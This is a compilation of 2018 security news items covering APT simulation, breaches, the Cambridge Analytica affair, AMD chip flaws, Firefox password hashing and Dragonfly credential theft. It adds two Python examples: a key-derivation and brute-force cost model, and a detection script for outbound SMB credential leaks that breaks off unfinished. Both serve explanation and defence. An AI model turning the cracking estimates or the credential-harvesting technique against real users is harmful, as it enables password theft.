Israeli Cybersecurity Startup Launches Automated Advanced Persistent Threat (APT) Simulation Platform
Penetration testing is the most effective method of testing whether existing security policy stands up against advanced attackers, but it doesn't scale well to large, dynamic networks, and only provides a single conclusion at a specific point in time. The solution is clearly automation.
XM Cyber is an Israeli firm founded in 2016. Its three co-founders are Tamir Pardo (formerly head of Mossad); Boaz Gorodissky (formerly head of technology for the government of Israel); and Noam Erez (who spent 25 years in Israeli intelligence). Its headquarters are in Israel, but with a presence in the U.S. and Australia. It has customers in Israel, the U.S. and Europe.
Its primary product, an automated APT simulation platform called HaXM, is unveiled today. The product simulates the possible behavior of an attacker in order to locate potential weaknesses on the system; and then, using the data gathered, provides recommendations for the remediation of those weaknesses. In this manner it provides automated red teaming with blue teaming to produce purple teaming at speed, continuously, and at scale.
"The problem we solve," VP of Product Adi Ashkenazy told SecurityWeek, "is that when you look at modern organizations and you see the kind of security stack they have in place, you have to wonder if they are actually securing their critical assets. This is something the companies ask themselves as well. They spend a lot of money on different products and vendors; but at the end of the day, if you ask them, 'are your critical assets secure?', they may have hope and some belief, but they have no concrete evidence to support the idea."
Manual penetration testing to prove the hypothesis of security, he continued, makes no sense for the modern organization that may have tens of thousands of endpoints, and hundreds of subsystems; and is continuously evolving and changing.
"This is why we founded XM Cyber," commented Noam Erez: "to equip enterprises with a continuous 360-degree view of which critical assets are at risk, what security issues they should focus on, and how best to harness their resources to resolve them."
HaXM places sensors only on 'endpoints of interest'. "We don't have to map the entire network," said Ashkenazy. "We deploy our sensors on the endpoints of interest within the infrastructure that hackers are able or likely to use. We try to be almost religious in the way we mimic attacks -- we don't put sensors on every endpoint."
Nor does HaXM start with any preconceived idea of a potential attack. "We don't define the attack vectors in advance," he said. "We act like a virtual hacker. We start from points of likely breach -- which could be internet-facing servers, for example; or endpoints that receive external email. We place our virtual hacker in those starting points with a tool box that mimics the capabilities of an advanced attacker; and from that moment on the virtual hacker mimics the steps taken by a real hacker trying to find his way to critical assets. We never know in advance what will be found, but so far the virtual hacker has always eventually managed to compromise the entire network."
This is HaXM's simulation mode, where great care is taken not to trigger any alarms from the customer's existing security stack. It checks for the conditions that could be used by an attacker. "This is what we use for 24/7 testing. But we also have a validation mode," added Ashkenazy. "When you switch to validation mode, this is not continuous, but is a controlled mode, where you specify when and where you want to actually test a specific attack vector -- and then we conduct the malicious activities to their full extent so that you can check the security stack in its entirety."
HaXM provides a visualization of the route an aggressor can take from initial entry point on a network to the company's critical assets. In doing this, it definitively presents the existence or absence of sufficient security, highlighting if and where additional security is necessary. While many security products seek to find indications of actual compromise after an initial breach, XM Cyber's approach is to find routes of potential compromise irrespective of an existing breach. It will not locate an attacker; but it will tell the customer what an attacker could achieve.
XM Cyber has offices in Herzliya, Israel; New York; and Sydney, Australia. It has raised $15 million as initial funding in its first two years. The product will be demonstrated at the RSA Conference in San Francisco, California on April 16-19, 2018.
Many oil and gas companies in the Middle East reported suffering at least one serious security incident in the past year, according to a study conducted by Ponemon Institute on behalf of German industrial giant Siemens.
Nearly 200 individuals responsible for overseeing cybersecurity risk in oil and gas companies in the Middle East have taken part in the study and the results show that many organizations are unprepared to address the risks faced by their operational technology (OT) networks.
According to Siemens, three-quarters of respondents said their organizations had suffered at least one security incident that resulted in disruption to operations in their OT environment or loss of confidential information in the past 12 months. Eleven percent of respondents said they had experienced more than 10 OT network intrusions, and nearly half believe they may not be aware of all breaches.
Roughly two-thirds of the individuals who took part in the survey believe the risk of attacks on industrial control systems (ICS) has increased considerably over the past few years, and 60 percent say there is a greater risk to OT environments compared to IT.
Outdated and ageing control systems pose a serious risk, according to 42 percent of respondents. The areas most at risk in Middle Eastern oil and gas companies are believed to be exploratory information, production information, potential partners, financial and organizational reports, operational data, information on drilling sites, and field production data collected by sensors.
Insider threats are the main concern, but only 21 percent of respondents are worried about malicious insiders; 68 percent are more worried about the cybersecurity impact of careless employees.
Companies appear aware of the risks, but many of them are not prepared to deal with them. Less than half of respondents say they continually monitor their entire infrastructure, and only a quarter are confident in their ability to address security risks and allocate the resources necessary for addressing them. On average, companies have allocated only a third of their cybersecurity budget to protecting OT environments, the report shows.
Siemens says many organizations are still attempting to air gap their ICS environments in an effort to mitigate threats, but only 39 percent plan on hardening endpoints, and 20 percent plan on adopting analytics solutions over the next year.
Cyberattacks on oil and gas and petrochemical companies can have a devastating impact. Researchers discovered recently a piece of malware that leveraged a zero-day vulnerability in Schneider Electric’s Triconex Safety Instrumented System (SIS). The attack is said to have targeted a petrochemical company in Saudi Arabia and one of the main suspects is Iran. According to some reports, the attackers may have been trying to trigger a deadly explosion at the targeted plant.
Moscow - Russia's Supreme Court on Tuesday ruled the popular Telegram messenger app must provide the country's security services with encryption keys to read users' messaging data, agencies reported.
Media watchdog Roskomnadzor instructed Telegram to "provide the FSB with the necessary information to decode electronic messages received, transmitted, or being sent" within 15 days, it said on its website.
Telegram had appealed against an earlier ruling that it must share this information, but this appeal was rejected on Tuesday.
If it does not provide the keys it could be blocked in Russia.
The free instant messaging app, which lets people exchange messages, photos and videos in groups of up to 5,000 people, has attracted more than 100 million users since its launch in 2013.
Telegram's self-exiled Russian founder Pavel Durov said in September 2017 the FSB had demanded backdoor access.
When Telegram did not provide the encryption keys, the FSB launched a formal complaint.
Durov wrote last year that the FSB's demands are "technically impossible to carry out" and violate the Russian Constitution which entitles citizens to privacy of correspondence.
Tuesday's ruling is the latest move in a dispute between Telegram and the Russian authorities as Moscow pushes to increase surveillance of internet activities.
Last June, Russia's state communications watchdog threatened to ban the app for failing to provide registration documents. Although Telegram later registered, it stopped short of agreeing to its data storage demands.
Companies on the register must provide the FSB with information on user interactions.
From this year they must also store all the data of Russian users inside the country, according to controversial anti-terror legislation passed in 2016 which was decried by internet companies and the opposition.
Coverity Scan, a free service used by tens of thousands of developers to find and fix bugs in their open source projects, was suspended in February after hackers breached some of its servers and abused them for cryptocurrency mining.
Synopsys, which acquired Coverity in 2014, started notifying Coverity Scan users about the breach on Friday. The company said malicious actors gained access to Coverity Scan systems sometime in February.
“We suspect that the access was to utilize our computing power for cryptocurrency mining,” Synopsys told users. “We have not found evidence that database files or artifacts uploaded by the open source community users of the Coverity Scan service were accessed. We retained a well-known computer forensics company to assist us in our investigation.”
Synopsys says the service is now back online and it believes the point of access leveraged by the attackers has been closed. In order to regain access to Coverity Scan, users will need to reset their passwords.
“Please note that the servers in question were not connected to any other Synopsys computer networks. This should have no impact on customers of our commercial products, and this event did not put any Synopsys corporate data or intellectual property at risk,” users were told.
Cybercriminals have become increasingly interested in making a profit by hacking PCs and servers and abusing them to mine cryptocurrencies. Cryptocurrency mining malware can target a wide range of devices, including industrial systems.
One recent high-profile victim was the carmaker Tesla, whose Kubernetes pods were compromised and used for cryptocurrency mining. According to RedLock, which discovered the breach, hackers gained access to Tesla’s Kubernetes console due to the lack of password protection.
Facebook's chief of security late Monday said his role has shifted to focusing on emerging risks and election security at the global social network, which is under fire for letting its platform be used to spread bogus news and manipulate voters.
Alex Stamos revealed the change in his role at work after a New York Times report that he was leaving Facebook in the wake of internal clashes over how to deal with the platform being used to spread misinformation.
"Despite the rumors, I'm still fully engaged with my work at Facebook," Stamos said in a message posted at his verified Twitter account.
"It's true that my role did change. I'm currently spending more time exploring emerging security risks and working on election security."
Stamos advocated investigating and revealing manipulation of news at the social network by Russian entities, to the chagrin of chief operating officer Sheryl Sandberg and other top executives, the Times reported, citing unnamed current and former employees.
Stamos reportedly decided in December he was done with Facebook, but remained at the social network as part of a plan to smoothly hand his job off to a successor. Neither Facebook nor Stamos directly commented on how long he intended to remain at the company, referring to his tweet in response to queries.
Word from Stamos came as the California-based social media giant faced an onslaught of criticism at home and abroad over revelations that a firm working for Donald Trump's presidential campaign harvested and misused data on 50 million members.
Calls for investigations came on both sides of the Atlantic after Facebook responded to the explosive reports of misuse of its data by suspending the account of Cambridge Analytica, a British firm hired by Trump's 2016 campaign.
Vera Jourova, the European commissioner for justice, consumers and gender equality, called the revelations "horrifying, if confirmed," and vowed to address concerns in the United States this week.
In Britain, parliamentary committee chair Damian Collins said both Cambridge Analytica and Facebook had questions to answer.
According to a joint investigation by the Times and Britain's Observer, Cambridge Analytica was able to create psychological profiles on 50 million Facebook users through a personality prediction app downloaded by 270,000 people, but also scooped up data from friends.
A Cambridge Analytica statement denied misusing Facebook data for the Trump campaign.
Facebook said it had hired a digital forensics firm to examine how the data leak occurred and to ensure that any data collected had been destroyed.
An undercover investigation of Cambridge Analytica by Britain's Channel 4 found executives boasted they could entrap politicians in compromising situations with bribes and Ukrainian sex workers, and spread misinformation online.
The executives claimed to have worked in more than 200 elections across the world, including Argentina, the Czech Republic, India, Kenya and Nigeria. The British firm said it "strongly denies" the claims from Channel 4 as well as reports on misuse of Facebook data.
Frost Bank, a subsidiary of Cullen/Frost Bankers, Inc., announced on Friday that it had discovered unauthorized access to electronically stored images of checks.
According to the company, it discovered last week that a third-party lockbox software program had been compromised, resulting in unauthorized users being able to view and copy images of checks stored electronically in the image archive. Frost Bank systems weren’t impacted in the incident, Frost says.
Customers can use lockbox services to send payments to a central post office box. The bank receives the payments and credits them directly to a business’s account.
The information that was accessed as part of the incident could be used to forge checks, the company says.
The company says it stopped the identified unauthorized access immediately after discovering it, and that it also launched an investigation into the matter. Frost says it is working with an unnamed cybersecurity firm to investigate the incident and that the law-enforcement authorities have been informed as well.
“At Frost, we care deeply about taking care of our customers and protecting their information, and we regret that this situation has occurred. We are working very hard to make things right,” Frost Chairman and CEO Phil Green said in a statement.
According to the company, the unauthorized access was limited to a software program serving around 470 commercial customers using the electronic lockbox. Impacted customers might experience forgeries on their accounts or could be informed of compromised check images.
[UPDATE] Facebook shares plunged Monday as the social media giant was pounded by criticism at home and abroad over revelations that a firm working for Donald Trump's presidential campaign harvested and misused data on 50 million members.
Calls for investigations came on both sides of the Atlantic after Facebook responded to explosive reports of misuse of its data by suspending the account of Cambridge Analytica, a British firm hired by Trump's 2016 campaign.
Democratic Senator Amy Klobuchar and Republican John Kennedy called for Facebook chief Mark Zuckerberg to appear before Congress, along with Google and Twitter's CEOs.
The lawmakers said the companies "have amassed unprecedented amounts of personal data" and that the lack of oversight "raises concerns about the integrity of American elections as well as privacy rights."
Facebook's chief of security Alex Stamos said his role has shifted to focusing on emerging risks and election security at the global social network.
Stamos revealed the change after The New York Times reported that he was leaving Facebook in the wake of internal clashes over how to deal with the platform being used to spread misinformation.
"Despite the rumors, I'm still fully engaged with my work at Facebook," Stamos said in a message posted on his verified Twitter account.
"It's true that my role did change. I'm currently spending more time exploring emerging security risks and working on election security."
Stamos advocated investigating and revealing manipulation of news at the social network by Russian entities, to the chagrin of other top executives, the Times reported, citing unnamed current and former employees.
- Profiles weaponized? -
Senator Ron Wyden asked Facebook to provide more information on what he called a "troubling" misuse of private data that could have been used to sway voters.
Wyden said he wants to know how Cambridge Analytica used Facebook tools "to weaponize detailed psychological profiles against tens of millions of Americans."
In Europe, officials voiced similar outrage.
Vera Jourova, the European commissioner for justice, consumers and gender equality, called the revelations "horrifying, if confirmed," and vowed to address concerns in the United States this week.
According to a joint investigation by The New York Times and Britain's Observer, Cambridge Analytica was able to create psychological profiles on 50 million Facebook users through the use of a personality prediction app that was downloaded by 270,000 people, but also scooped up data from friends.
Cambridge Analytica denied misusing Facebook data for the Trump campaign.
Elizabeth Denham, Britain's Information Commissioner who regulates the sector in the country, announced her office would seek a court warrant on Tuesday to search Cambridge Analytica's computer servers.
She said the company had been "uncooperative" to requests for access to its records and missed a Monday deadline stipulated.
Meanwhile, Facebook said it has hired a digital forensics firm to examine how the data leak occurred and to ensure that any data collected had been destroyed.
Facebook shares skidded 6.8 percent by the close of the Nasdaq on concerns about pressure for new regulations that could hurt its business model.
Shares slipped another percent or so to $170 in after-market trades.
The sell-off spread to other technology giants on Wall Street including Apple, Google-parent Alphabet and Netflix. Asian markets extended the losses, with Tokyo-listed Sony down, Samsung falling in Seoul and Tencent retreating in Hong Kong.
'Self-regulation not working'
Jennifer Grygiel, a Syracuse University professor who studies social media, said the disclosures will increase pressure to regulate Facebook and other social media firms, already under scrutiny for allowing disinformation from Russian-directed sources to propagate.
"Self-regulation is not working," Grygiel said.
Daniel Kreiss, a professor of media and communications at the University of North Carolina, said Facebook failed to live up to its responsibilities on election ads.
"The fact that Facebook seems to make no distinction between selling sneakers and selling a presidential platform is a deep problem," Kreiss said.
Brian Wieser at Pivotal Research maintained that the revelations highlight "systemic problems at Facebook," but that they won't immediately impact the social network's revenues.
David Carroll, a media professor at the Parsons School of Design, said Facebook and others will soon be forced to live with new privacy rules such as those set to take effect in the European Union.
"Facebook and Google will have to ask users a lot more permission to track them," Carroll said. "Most people are going to say no, so I think it's going to have a huge impact on these companies."
Carroll has filed a legal action in Britain calling on Cambridge Analytica to disclose what data was gathered and used on him.
An undercover investigation of Cambridge Analytica by Britain's Channel 4 said executives boasted they could entrap politicians in compromising situations with bribes and Ukrainian sex workers, and spread misinformation online.
The executives claimed to have worked in more than 200 elections across the world, including Argentina, the Czech Republic, India, Kenya and Nigeria.
The British firm said it "strongly denies" the claims from Channel 4 as well as reports on misuse of Facebook data.
"Facebook data was not used by Cambridge Analytica as part of the services it provided to the Donald Trump presidential campaign," a statement read.
Another cybersecurity firm has independently confirmed some of the AMD processor vulnerabilities discovered by Israel-based CTS Labs, but the controversial disclosure has not had a significant impact on the value of the chip giant’s stock.
CTS Labs last week published a brief description of 13 allegedly critical vulnerabilities and backdoors found in EPYC and Ryzen processors from AMD. The company says the flaws can be exploited for arbitrary code execution, bypassing security features (e.g. Windows Defender Credential Guard, Secure Boot), stealing data, helping malware become resilient against security products, and damaging hardware.
The flaws have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA, and exploiting them requires elevated privileges on the targeted machine, though physical access is not required. The security firm will not disclose technical details any time soon in order to prevent abuse.
CTS Labs, which no one had heard of until last week, came under fire shortly after its disclosure for giving AMD only 24 hours' notice before going public with its findings, and for apparently attempting to short AMD stock. The company later made some clarifications regarding the flaws and its disclosure method.
While initially many doubted CTS Labs’ claims due to the lack of technical information, an increasing number of independent researchers have confirmed that the vulnerabilities do in fact exist. Nevertheless, there are still many industry professionals who believe their severity has been greatly exaggerated.
Trail of Bits was the first to independently review the findings. The company, which has been paid for its services, has confirmed that the proof-of-concept (PoC) exploits developed by CTS Labs work as intended, but believes that there is “no immediate risk of exploitation of these vulnerabilities for most users.”
“Even if the full details were published today, attackers would need to invest significant development efforts to build attack tools that utilize these vulnerabilities. This level of effort is beyond the reach of most attackers,” Trail of Bits said in a blog post.
On Monday, Check Point also confirmed two of the RYZENFALL vulnerabilities following its own review. The security firm says it does not have any relationship with CTS Labs and it has not received any payment for its services. It also noted that it does not agree with the way CTS disclosed its findings, describing it as “very irresponsible.”
“In our opinion the original CTS Labs report might have been problematically phrased in a way that misrepresented the threat model and impact that the RYZENFALL-1 and RYZENFALL-3 vulnerabilities present,” Check Point said in a blog post. “However, problematic phrasing aside, after inspecting the technical details of the above, we can indeed verify that these are valid vulnerabilities and the risks they pose should be taken under consideration.”
Alex Ionescu, a reputable researcher and Windows security expert, also confirmed the findings and warned that “admin-level access and persistence are legitimate threats in multi-tenant IaaS and even things such as VTL0/1 (Credential Guard) when firmware and chipset trust boundaries are broken.”
AMD is investigating the claims, but it has yet to make any statement regarding the impact of the flaws.
Less than an hour after CTS Labs released its report, a controversial company named Viceroy Research published what it described as an “obituary” in hopes of leveraging the findings to short AMD stock. Since CTS’s report also included a disclaimer noting that the company had a financial interest, many assumed the two were working together to short AMD.
While CTS has avoided answering questions regarding its financial interests, Viceroy representatives told Vice’s Motherboard that the company obtained the report describing the vulnerabilities from an “anonymous tipster” and claimed to have no connection to the security firm.
Viceroy’s attempt has had an insignificant impact on AMD stock and experts doubt the situation will change. This is not actually surprising considering that Intel was hit the hardest by Meltdown and Spectre — critical vulnerabilities disclosed by reputable researchers — and still the impact on the company’s stock has been only minor and temporary.
Recovering Encrypted Firefox Passwords via Brute Force Attacks is Easy, Developer Says
Firefox does a poor job at securing stored passwords even if the user has set up a master password, a software developer claims.
According to Wladimir Palant, author of the popular Adblock Plus extension, the password manager in Firefox and Thunderbird needs some major improvements in terms of security. The manager can spill out passwords in less than a minute, he says.
The issue, Palant claims, resides in the manner in which the manager converts a password into an encryption key. The operation is performed by the sftkdb_passwordToKey() function, which applies SHA-1 hashing to a string consisting of a random salt and the actual master password.
In the current implementation, the SHA-1 function has a very low iteration count of 1, meaning that it falls way behind what’s considered a minimum value in practice, namely 10,000. In fact, an iteration count of at least 1,000 was considered “modest” decades ago.
Because of that, recovering encrypted passwords via brute force attacks is not difficult at all, Palant says. In fact, he underlines that graphics processing units (GPUs) are great at calculating SHA-1 hashes. With some of them capable of calculating billions of SHA-1 hashes per second, it would not take more than a minute to crack the passwords encrypted and stored in Firefox.
This NSS bug was first reported about nine years ago, but remains unpatched. And it wouldn’t even be that difficult to address the issue, the developer says.
“NSS library implements PBKDF2 algorithm which would slow down bruteforcing attacks considerably if used with at least 100,000 iterations. Of course, it would be nice to see NSS implement a more resilient algorithm like Argon2 but that’s wishful thinking seeing a fundamental bug that didn’t find an owner in nine years,” Palant notes.
Robert Relyea, who has worked for over 20 years on NSS, notes that, while the iteration count could be increased, it would not affect the security of existing databases, which would remain readable with their old parameters. Only changing the master password (even to the same password) would re-derive the key with the higher iteration count.
The issue was thought to have been resolved for PKCS #12, but it was not fixed for the NSS database password (the Firefox master password) as well. Relyea therefore reopened the bug so it could be properly addressed.
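To make the key-derivation point concrete, here is an added example in Python (it is not Firefox or NSS code): it models the legacy one-iteration SHA-1 derivation beside a PBKDF2 derivation, shows how the iteration count scales the cost of testing candidate passwords, and models why unlocking must use the parameters stored with each database, so that a higher default only reaches a database once its master password is re-set. The salt, password, record layout, check tag and hash rate are all constructed for the example.

```python
"""Added example, not Firefox/NSS code: a model of the master-password key
derivation discussed above and of why a higher default iteration count
only reaches a database when its master password is re-set."""
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Optional

# Constructed sample values for the example; a real NSS database stores its
# own random salt next to the encrypted secrets.
SAMPLE_SALT = b"constructed-16B-salt"
SAMPLE_PASSWORD = "correct horse battery"
CHECK_TAG = b"master-password-check"   # hypothetical input for the check value
DEFAULT_KDF = ("pbkdf2", 100_000)       # assumed default a fixed build would use


def legacy_key(salt: bytes, password: str, iterations: int = 1) -> bytes:
    """Legacy derivation as the article describes it: SHA-1 over
    salt || password, with an iteration count that defaults to 1.
    Extra iterations re-hash the previous digest."""
    digest = hashlib.sha1(salt + password.encode("utf-8")).digest()
    for _ in range(iterations - 1):
        digest = hashlib.sha1(digest).digest()
    return digest


def pbkdf2_key(salt: bytes, password: str, iterations: int = 100_000) -> bytes:
    """Stronger derivation: PBKDF2-HMAC-SHA256, 20-byte output to match SHA-1's."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                               iterations, dklen=20)


def estimated_seconds(candidates: int, hashes_per_second: float,
                      iterations: int) -> float:
    """Time to test every candidate at a given hash rate; the cost of one
    guess grows linearly with the iteration count, which is the whole
    point of raising it."""
    return candidates * iterations / hashes_per_second


@dataclass
class KeyRecord:
    """Hypothetical database header: the salt, the KDF parameters the
    record was created with, and a check value for verifying the master
    password. The layout is illustrative, not NSS's on-disk format."""
    salt: bytes
    kdf: str            # "sha1" (legacy) or "pbkdf2"
    iterations: int
    check: bytes        # HMAC-SHA256(key, CHECK_TAG)


def derive(kdf: str, salt: bytes, password: str, iterations: int) -> bytes:
    if kdf == "sha1":
        return legacy_key(salt, password, iterations)
    if kdf == "pbkdf2":
        return pbkdf2_key(salt, password, iterations)
    raise ValueError(f"unknown kdf {kdf!r}")


def create_record(password: str, kdf: str = "sha1", iterations: int = 1,
                  salt: Optional[bytes] = None) -> KeyRecord:
    if salt is None:
        salt = os.urandom(16)
    key = derive(kdf, salt, password, iterations)
    check = hmac.new(key, CHECK_TAG, "sha256").digest()
    return KeyRecord(salt, kdf, iterations, check)


def unlock(record: KeyRecord, password: str) -> Optional[bytes]:
    """Unlocking must use the parameters stored in the record, so an old
    database stays readable, and stays as weak as it was, whatever the
    current default is."""
    key = derive(record.kdf, record.salt, password, record.iterations)
    expected = hmac.new(key, CHECK_TAG, "sha256").digest()
    return key if hmac.compare_digest(expected, record.check) else None


def change_master_password(record: KeyRecord, old_password: str,
                           new_password: str) -> KeyRecord:
    """Re-setting the master password (even to the same one) is what
    re-derives the key under the current default KDF and iteration count."""
    if unlock(record, old_password) is None:
        raise ValueError("wrong master password")
    kdf, iterations = DEFAULT_KDF
    return create_record(new_password, kdf, iterations)


if __name__ == "__main__":
    # Constructed rate: the article cites GPUs doing billions of SHA-1/s.
    rate = 1e9
    for iters in (1, 1_000, 100_000):
        print(f"{iters:>7} iterations: 1e9 candidates take "
              f"{estimated_seconds(10**9, rate, iters):,.0f} s")
    old = create_record(SAMPLE_PASSWORD, salt=SAMPLE_SALT)  # legacy, 1 iteration
    new = change_master_password(old, SAMPLE_PASSWORD, SAMPLE_PASSWORD)
    print("old:", old.kdf, old.iterations, "-> new:", new.kdf, new.iterations)
```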
Mozilla is also working on a new password manager component for Firefox. Dubbed Lockbox and available as an extension, it might not solve the issue either, Palant says, pointing out that it relies on Firefox Accounts, which could prevent wide adoption.
Even though this issue still exists in Firefox, setting up a master password for Firefox's password manager is still better than using none. Of course, using a password manager that isn’t impacted by such bugs is even better, although cracking firms would say that the security of such tools is debatable.
Aviation, as part of the transportation sector, falls within the critical infrastructure. While it may not have the same security issues as ICS/SCADA-based manufacturing and utilities, it has certain conceptual similarities; including, for example, a vital operational technology infrastructure with increasing internet connectivity, and the associated cyber risks.
It also has one major difference -- the close physical proximity of its own customers. Catastrophic failure in the aviation industry has a more immediate and dramatic effect on customers -- and for this reason alone, a trusted brand image is an essential and fragile part of success in the aviation industry. Without customer trust, customers will not fly with a particular airline.
Historically, aviation security has primarily focused on physical safety, and has become highly efficient in this area. But in recent years, the customization of new aircraft to provide newer and unique passenger experiences -- such as the latest in internet-connected in-flight entertainment systems -- has added a new cyber risk.
Matthieu Gualino, deputy director of the International Civil Aviation Organization Aviation Security Training Center, described the three current areas of cyber risk as flight control (the critical systems needed to fly the aircraft -- high impact, low likelihood); the operational cabin (systems used to operate and maintain aircraft -- medium impact, medium likelihood); and passengers (systems with direct passenger interaction -- low impact, high likelihood).
The problem today is that aviation security is experienced in operational technology, security and safety; but less experienced in the rapidly evolving world of cyber security. To help counter this risk, Finland's F-Secure has launched its new Aviation Cyber Security Services to help secure not just aircraft, but the entire aviation industry: aircraft, infrastructure, data, and -- most importantly to F-Secure -- reputation. Customers are unlikely to fly with companies they do not trust; and successful cyber-attacks rapidly eliminate customer trust and confidence; even, suggests F-Secure, a minor breach of something like an in-flight entertainment system.
"Off-the-shelf communication technologies are finding their way into aircraft, which makes security much more complicated than in the past," said Hugo Teso, head of aviation cybersecurity services at F-Secure and a former pilot. "Because these off-the-shelf technologies weren't necessarily created to meet the rigorous safety requirements of airlines, the aviation industry is making cyber security a top priority. But they need a partner that understands both cyber security and the details of airline operations, because it's an industry where those details make a big difference."
The new service integrates security assessments of avionics, ground systems and data links, vulnerability scanners, security monitoring, incident response services, and specialized cyber security training for staff.
The primary problem is not unknown to the security industry -- the need to protect safety-critical systems from less significant but more exposed and vulnerable systems (such as those with an internet connection). "A key protection measure is separating systems into different 'trust domains'," explains F-Secure's head of Hardware Security Andrea Barisani, "and then controlling how systems in different domains can interact with one another. This prevents security issues in one domain, like a Wi-Fi service accessible to passengers, from affecting safety-critical systems, like aircraft controls or air to ground datalinks."
Data diodes are typically used for this type of system segmentation, because they provide unidirectional data flows where complete bidirectional isolation is not possible. "It is essential for any data diode to be implemented in a manner that allows no attack, parsing errors or ambiguities, failures to affect their correct operation," Barisani told SecurityWeek. "Our team is routinely involved in testing data diode security to provide assurance on their operation, improve their design and fix any issues well before their certification."
Diodes are part of the separation of the vulnerable passenger facilities from the critical flight operations. "In-flight entertainment and connectivity (IFE/IFC) are two of the most exposed systems in modern aircraft," explained Teso. "Facing directly the passengers, those systems are a major cyber security concern to any operator as any incident would have important brand damage for them. Not to safety though. Due to the way aircraft are designed, built and upgraded any incident involving or originating in the cabin of the airplane will be isolated from the most critical, and safety related, systems."
F-Secure is keen not to promote its new service with the 'fear factor'. The aviation industry already does an excellent job at maintaining the safety of its flights. The new cyber risk is currently primarily against aviation's brand reputation, and the threat of a cyber hijack taking over an aircraft in flight is, Teso suggests, more likely in the movies than in reality.
But that doesn't mean it can be dismissed or forever ignored, or even limited to civil aviation. The aviation industry, including both civil and military aircraft, shares a common core of technologies, although the threat model differs between the two. Nevertheless, commented Teso, "F-Secure aviation cyber security services is not limited to any specific part of the aviation industry. If it's part of Aviation, our services have it covered."
At the center of a scandal over alleged misuse of Facebook users' personal data, Cambridge Analytica is a communications firm hired by those behind Donald Trump's successful US presidential bid.
An affiliate of British firm Strategic Communication Laboratories (SCL), Cambridge Analytica has offices in London, New York, Washington, as well as Brazil and Malaysia.
Here's the story behind the company using data to fuel political campaigns:
What does Cambridge Analytica do?
The company boasts it can "find your voters and move them to action" through data-driven campaigns and a team including data scientists and behavioural psychologists.
"Within the United States alone, we have played a pivotal role in winning presidential races as well as congressional and state elections," with data on more than 230 million American voters, Cambridge Analytica claims on its website.
Speaking to TechCrunch in 2017, CEO Alexander Nix said the firm was "always acquiring more" data. "Every day we have teams looking for new data sets," he told the site.
Who are the company's clients?
As well as working on the election which saw Trump reach the White House, Cambridge Analytica has been involved in political campaigns around the world.
In the US, analysts harnessed data to generate thousands of messages targeting voters through their profiles on social media such as Facebook, Snapchat, or the Pandora Radio streaming service.
British press have credited Cambridge Analytica with providing services to pro-Brexit campaign Leave.EU, but Nix has denied working for the group.
Globally, Cambridge Analytica said it has worked in Italy, Kenya, South Africa, Colombia and Indonesia.
What has the company been accused of?
According to the New York Times and Britain's Observer newspapers, Cambridge Analytica stole information from 50 million Facebook users' profiles in the tech giant's biggest-ever data breach, to help them design software to predict and influence voters' choices at the ballot box.
University of Cambridge psychologist Aleksandr Kogan created a personality prediction test app, thisisyourdigitallife, which was downloaded by 270,000 people.
The tool allowed Kogan to access information such as content Facebook users had "liked" and the city they listed on their profile, which was then passed to SCL and Cambridge Analytica.
The Observer reported the app also collected information from the Facebook friends of people who had taken the test.
Christopher Wylie, a former Cambridge Analytica employee, worked with Kogan and told Canadian television channel CBC the company used "private data they acquired without consent".
Who else is involved?
US hedge fund billionaire and major Republican Party donor Robert Mercer bankrolled Cambridge Analytica to the tune of $15 million (12 million euros).
The Observer said it was headed at the time by Steve Bannon, a top Trump adviser until he was fired last summer.
How has Facebook responded?
Facebook suspended SCL and Cambridge Analytica, as well as Kogan and Wylie. In explaining its decision on Friday, the social media giant said the thisisyourdigitallife app was legitimate, but accused Kogan of subsequently violating Facebook's terms by passing the data on to SCL/Cambridge Analytica.
Facebook said it found out what had happened in 2015 and was told all parties involved had deleted the data.
"The claim that this is a data breach is completely false," Facebook said in a new statement on Saturday, saying app users knowingly provided their information.
A cyberespionage group believed to be operating out of Russia hijacked a Cisco router and abused it to obtain credentials that were later leveraged in attacks targeting energy companies in the United Kingdom, endpoint security firm Cylance reported on Friday.
The United States last week announced sanctions against Russian spy agencies and more than a dozen individuals for trying to influence the 2016 presidential election and launching cyberattacks, including the NotPetya attack and campaigns targeting energy firms. Shortly after, US-CERT updated an alert from the DHS and FBI to officially accuse the Russian government of being responsible for critical infrastructure attacks launched by a threat actor tracked as Dragonfly, Crouching Yeti and Energetic Bear.
A warning issued last year by the UK’s National Cyber Security Centre (NCSC) revealed that hackers had targeted the country’s energy sector, abusing the Server Message Block (SMB) protocol and attempting to harvest victims’ passwords.
An investigation conducted by Cylance showed that the attacks were likely carried out by the Dragonfly group. The security firm has observed a series of phishing attacks aimed at the energy sector in the UK using two documents claiming to be resumes belonging to one Jacob Morrison.
When opened, the documents fetched a template file and attempted to automatically authenticate to a remote SMB server controlled by the attackers. This template injection technique was detailed last year by Cisco Talos following Dragonfly attacks on critical infrastructure organizations in the United States.
When a malicious document is opened using Microsoft Word, it loads a template file from the attacker’s SMB server. When the targeted device connects to the SMB server, it will attempt to authenticate using the current Windows user’s domain credentials, basically handing them over to the attackers.
In a separate analysis of such attacks, Cylance noted that while the credentials will in most cases be encrypted, even an unsophisticated attacker will be able to recover them in a few hours or days, depending on their resources.
According to Cylance, Dragonfly used this technique to harvest credentials that were later likely used to hack the systems of energy sector organizations in the United Kingdom.
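The credential leak described above is visible at the network layer: a user's workstation, on behalf of an Office process, opens an SMB session to a host on the Internet. The following is an added example, not code from Cylance or Cisco Talos, that flags such connections in endpoint telemetry. It assumes Sysmon Event ID 3 (network connection) records exported as JSON lines; the Office process names and the internal address ranges are assumptions to be tuned to the environment, and the sample events are constructed using documentation IP ranges.

```python
"""Flag outbound SMB connections that would hand a Windows user's domain
credentials to a server outside the organisation, the pattern behind the
template injection attacks described above.

Assumes Sysmon Event ID 3 records as JSON lines (field names follow Sysmon).
All sample events below are constructed for this example.
"""
import ipaddress
import json

# Address space treated as "inside" (assumption: tune to the organisation's own plan).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]
SMB_PORTS = {445, 139}
# Office applications that have no business opening an SMB session to the Internet.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed sample events (documentation ranges 203.0.113.0/24, 198.51.100.0/24, 192.0.2.0/24).
SAMPLE_EVENTS = [
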